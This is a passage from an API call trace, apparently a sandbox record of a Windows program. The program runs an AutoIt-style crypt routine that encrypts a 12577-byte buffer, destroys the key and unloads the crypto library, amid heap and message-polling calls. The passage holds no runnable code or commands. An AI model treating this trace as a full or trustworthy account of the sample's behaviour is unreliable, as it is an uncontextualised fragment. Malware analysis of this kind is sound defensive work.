hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.569] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.569] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.569] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.569] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.569] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.569] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.569] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.569] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.570] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.570] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.570] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.570] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.570] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.570] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3119, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3120) returned 1 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.570] CharLowerBuffW (in: lpsz="byte[12577]", cchLength=0xb | out: lpsz="byte[12577]") returned 0xb [0030.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.571] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.571] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.571] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x89ffb8*, pdwDataLen=0x6ae220*=0x3119, dwBufLen=0x3120 | out: pbData=0x89ffb8*, pdwDataLen=0x6ae220*=0x3120) returned 1 [0030.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.571] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.572] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.572] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.572] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.572] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.572] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.572] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.572] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.572] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.572] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.572] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.572] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.573] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.573] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.574] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.574] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.574] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.574] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.574] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.574] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.574] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.574] CryptDestroyKey (hKey=0x7c2200) returned 1 [0030.574] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.574] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.574] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.574] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.574] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.574] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.575] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.575] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.575] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.575] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.575] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.575] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.576] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.576] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.576] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.576] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.576] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.577] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, 